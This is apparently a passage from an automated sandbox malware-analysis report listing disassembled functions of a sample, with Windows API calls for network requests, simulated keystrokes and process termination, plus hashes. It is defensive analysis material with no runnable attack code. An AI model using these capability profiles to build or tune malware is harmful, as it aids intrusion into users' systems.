                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                              • String ID: 0$F
                                                              • API String ID: 161812096-3044882817
                                                              • Opcode ID: 78a50b010681367ce44ca689bd982357cf93752ee032cf4b4bf8060841c5a672
                                                              • Instruction ID: fb7dd777886a92c1c30a94aa4163d9eba9a922d7348d844dce7ef20a4c98c52f
                                                              • Opcode Fuzzy Hash: 78a50b010681367ce44ca689bd982357cf93752ee032cf4b4bf8060841c5a672
                                                              • Instruction Fuzzy Hash: E6415BB5601349EFDB18DF65D895BAA7BB9FF4A314F140028FA569B350C731AA20CF50
                                                              Function 00CB276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00CB27F4
                                                              • GetDlgCtrlID.USER32 ref: 00CB27FF
                                                              • GetParent.USER32 ref: 00CB281B
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB281E
                                                              • GetDlgCtrlID.USER32(?), ref: 00CB2827
                                                              • GetParent.USER32(?), ref: 00CB283B
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB283E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 711023334-1403004172
                                                              • Opcode ID: a70d0d254cbb47d9a48b1741fa1746e1293a8580aa52dfd8f395bfdece9e33f3
                                                              • Instruction ID: 0c873d8a80db37a028d3391f6df295b0a579f39cef497c420d79c25d5859282b
                                                              • Opcode Fuzzy Hash: a70d0d254cbb47d9a48b1741fa1746e1293a8580aa52dfd8f395bfdece9e33f3
                                                              • Instruction Fuzzy Hash: D421C275900118BBCF15AFA0DC85FEEBBB9EF05310F100516B962AB2E6CB794948DB60
                                                              Function 00CB2850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00CB28D3
                                                              • GetDlgCtrlID.USER32 ref: 00CB28DE
                                                              • GetParent.USER32 ref: 00CB28FA
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB28FD
                                                              • GetDlgCtrlID.USER32(?), ref: 00CB2906
                                                              • GetParent.USER32(?), ref: 00CB291A
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB291D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 711023334-1403004172
                                                              • Opcode ID: 0c65b24983cf84e6274f0b41579cc33ea357dea94eeeff0ef49fab001353c28e
                                                              • Instruction ID: 1d05787841c9ca95527e73d6b2d747d026bd926cbc7d0de9debb6c60d76a1a76
                                                              • Opcode Fuzzy Hash: 0c65b24983cf84e6274f0b41579cc33ea357dea94eeeff0ef49fab001353c28e
                                                              • Instruction Fuzzy Hash: AD21C675D00158BBCF11AFA4DC85FEEBFB9EF04310F004415B951AB196DB798949DB60
                                                              Function 00CE4382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CE43FC
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CE43FF
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CE4426
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CE4449
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CE44C1
                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00CE450B
                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00CE4526
                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00CE4541
                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00CE4555
                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00CE4572
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow
                                                              • String ID:
                                                              • API String ID: 312131281-0
                                                              • Opcode ID: d0abf93ac682768a380b932ae82a7acdafb12740efb59f757dae6aa14faebfc2
                                                              • Instruction ID: eaa35cded49bf26cb52f98839e10530420db89df5fbfe75688bddb2c3594c9d1
                                                              • Opcode Fuzzy Hash: d0abf93ac682768a380b932ae82a7acdafb12740efb59f757dae6aa14faebfc2
                                                              • Instruction Fuzzy Hash: 5F617A75900248AFDB25DFA9CC81EFE77B8EB49310F10416AFA14E72A1C774AA45DF60
                                                              Function 00CCCBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CCCBCF
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CCCBF7
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CCCC27
                                                              • GetLastError.KERNEL32 ref: 00CCCC7F
                                                              • SetEvent.KERNEL32(?), ref: 00CCCC93
                                                              • InternetCloseHandle.WININET(00000000), ref: 00CCCC9E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              • Opcode ID: eb7e0d1aa1fb4b4d396a288f71d478517b1b398962ada7f5c7e4810b7f206998
                                                              • Instruction ID: 2e56c0d12cdea50225d72a71515e158724210927ef7d965c271153c3b949973b
                                                              • Opcode Fuzzy Hash: eb7e0d1aa1fb4b4d396a288f71d478517b1b398962ada7f5c7e4810b7f206998
                                                              • Instruction Fuzzy Hash: C03156B1600608AFD7219F65C9C8FAB7BFCEB49744B10452EF44ED6200DB34DA04ABA1
                                                              Function 00CBA12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C95437,?,?,Bad directive syntax error,00CEDCD0,00000000,00000010,?,?), ref: 00CBA14B
                                                              • LoadStringW.USER32(00000000,?,00C95437,?), ref: 00CBA152
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CBA216
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 858772685-4153970271
                                                              • Opcode ID: cedf1f91b0c2b62908787174165aa203e96e4bd8b267e3e0b3d90009391a038c
                                                              • Instruction ID: de37352a807fe3f8b93a104633c3cb454a24950d8125d0998daa032eef15de24
                                                              • Opcode Fuzzy Hash: cedf1f91b0c2b62908787174165aa203e96e4bd8b267e3e0b3d90009391a038c
                                                              • Instruction Fuzzy Hash: 88219E3194021EFFCF12AF90CC46EEE7B39BF18305F044455F915660A2EA719A58EB21
                                                              Function 00CB292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32 ref: 00CB293B
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00CB2950
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CB29DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1290815626-3381328864
                                                              • Opcode ID: 9ee6774e2a6c1d98ed01a3ab227e051c50ea0123e83502e035255714c3d6ad3b
                                                              • Instruction ID: 159d800cf96b191ddb5b3e4cc525739bfe929508484000158472c68ce2e4c131
                                                              • Opcode Fuzzy Hash: 9ee6774e2a6c1d98ed01a3ab227e051c50ea0123e83502e035255714c3d6ad3b
                                                              • Instruction Fuzzy Hash: A8110676A48306BEFA142621EC07DEA37DCCF11760F204016FA59E80D1EF65A9855554
                                                              Function 00CCCAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CCCADF
                                                              • GetLastError.KERNEL32 ref: 00CCCAF2
                                                              • SetEvent.KERNEL32(?), ref: 00CCCB06
                                                                • Part of subcall function 00CCCBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CCCBCF
                                                                • Part of subcall function 00CCCBB0: GetLastError.KERNEL32 ref: 00CCCC7F
                                                                • Part of subcall function 00CCCBB0: SetEvent.KERNEL32(?), ref: 00CCCC93
                                                                • Part of subcall function 00CCCBB0: InternetCloseHandle.WININET(00000000), ref: 00CCCC9E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 337547030-0
                                                              • Opcode ID: 8793c9dfb0e946bba4d7a0b66b91fb7fa28e7eca023bd6eee598259efa453b4f
                                                              • Instruction ID: a5543504736a3acb4eec1e5cd03fed0360542a3c6efacd6a4a74665c9e63fde8
                                                              • Opcode Fuzzy Hash: 8793c9dfb0e946bba4d7a0b66b91fb7fa28e7eca023bd6eee598259efa453b4f
                                                              • Instruction Fuzzy Hash: 2A318A71600B45AFDB219FA1CD95F6ABBF9FF08300B00442DF96A86610D730ED10ABA0
                                                              Function 00CB2E32 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CB42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CB42E6
                                                                • Part of subcall function 00CB42CC: GetCurrentThreadId.KERNEL32 ref: 00CB42ED
                                                                • Part of subcall function 00CB42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CB2E43), ref: 00CB42F4
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB2E4D
                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CB2E6B
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00CB2E6F
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB2E79
                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CB2E91
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00CB2E95
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB2E9F
                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CB2EB3
                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00CB2EB7
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                              • String ID:
                                                              • API String ID: 2014098862-0
                                                              • Opcode ID: 8806e907c45476b2372aa93a417f7bda7a00753ab6b5bf13dc76b625f577e02f
                                                              • Instruction ID: 2ca855244f207c5ede657cb5c97f83778344eb98e1a3ceae939e4b961b105419
                                                              • Opcode Fuzzy Hash: 8806e907c45476b2372aa93a417f7bda7a00753ab6b5bf13dc76b625f577e02f
                                                              • Instruction Fuzzy Hash: F901D431384354BBFB106B699CCAF9E3F59DB4AB22F100401F319AE1E1C9E26444DA6A
                                                              Function 00CB2093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00CB1CD9,?,?,00000000), ref: 00CB209C
                                                              • HeapAlloc.KERNEL32(00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20A3
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CB1CD9,?,?,00000000), ref: 00CB20B8
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20C0
                                                              • DuplicateHandle.KERNEL32(00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20C3
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CB1CD9,?,?,00000000), ref: 00CB20D3
                                                              • GetCurrentProcess.KERNEL32(00CB1CD9,00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20DB
                                                              • DuplicateHandle.KERNEL32(00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20DE
                                                              • CreateThread.KERNEL32(00000000,00000000,00CB2104,00000000,00000000,00000000), ref: 00CB20F8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: eda68fa47e0a46cc7a65f75f10d045583877c18df9325898dc5f2b745d49e829
                                                              • Instruction ID: 54e52ead45deee62468750a0fa1fde13209af86915719046f9b0b43dea0b90f9
                                                              • Opcode Fuzzy Hash: eda68fa47e0a46cc7a65f75f10d045583877c18df9325898dc5f2b745d49e829
                                                              • Instruction Fuzzy Hash: 00016BB5640348BFE710ABA5DC8DF6F7BACEB89721F414411FA15DF1A1CA759800CB61
                                                              Function 00CDAA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CBDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 00CBDCC1
                                                                • Part of subcall function 00CBDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 00CBDCCF
                                                                • Part of subcall function 00CBDC9C: CloseHandle.KERNELBASE(00000000), ref: 00CBDD9C
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CDAACC
                                                              • GetLastError.KERNEL32 ref: 00CDAADF
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CDAB12
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CDABC7
                                                              • GetLastError.KERNEL32(00000000), ref: 00CDABD2
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CDAC23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: 72a406119ed24267c7581a80fd1f38171b4aae4f3e02ee54c4b00ee1e7a10b41
                                                              • Instruction ID: 891e72f28460d42b0f30dd77caba424852d8167e1fab4da0c42ae06e62b14d75
                                                              • Opcode Fuzzy Hash: 72a406119ed24267c7581a80fd1f38171b4aae4f3e02ee54c4b00ee1e7a10b41
                                                              • Instruction Fuzzy Hash: 7261A234204241AFD314DF15C494F1ABBE1AF54318F14848EE5664F7A3C775EE8ACB92
                                                              Function 00CE41E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CE4284
                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00CE4299
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CE42B3
                                                              • _wcslen.LIBCMT ref: 00CE42F8
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CE4325
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CE4353
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcslen
                                                              • String ID: SysListView32
                                                              • API String ID: 2147712094-78025650
                                                              • Opcode ID: de9a91906ecb7812e99c4439101150761ae7271b472d0760d49e5d534d827d9d
                                                              • Instruction ID: 72e2a02b5f1d4945d07d7182fd7d47ab328b610df63ac53adc01ce1c8327f499
                                                              • Opcode Fuzzy Hash: de9a91906ecb7812e99c4439101150761ae7271b472d0760d49e5d534d827d9d
                                                              • Instruction Fuzzy Hash: 0A41C031A00358ABDB259F65CC49BEE7BA9FF48350F100526F958EB291D7709E84DB90
                                                              Function 00CBC53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CBC5D9
                                                              • IsMenu.USER32(00000000), ref: 00CBC5F9
                                                              • CreatePopupMenu.USER32 ref: 00CBC62F
                                                              • GetMenuItemCount.USER32(01305E38), ref: 00CBC680
                                                              • InsertMenuItemW.USER32(01305E38,?,00000001,00000030), ref: 00CBC6A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                              • String ID: 0$2
                                                              • API String ID: 93392585-3793063076
                                                              • Opcode ID: 686b5982b837c6b4587deb4f80124c7ba03003690f611667fe6d83e35e1faf41
                                                              • Instruction ID: 1d19a8c1ddb9f6df5ad7636a6a2fb9ef353378a5453dd9df42b43ee7c2b2a768
                                                              • Opcode Fuzzy Hash: 686b5982b837c6b4587deb4f80124c7ba03003690f611667fe6d83e35e1faf41
                                                              • Instruction Fuzzy Hash: 1851BF70A01345ABDF20CF68C9C8FEEBBF5AF58314F145129F8219B2A1E7709A44CB61
                                                              Function 00CBE653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 642191829-3771769585
                                                              • Opcode ID: fe161c8b597ec11c5d7ccb2f66b44ddd3c2a3ce41ac0b7f955dfbff99834462b
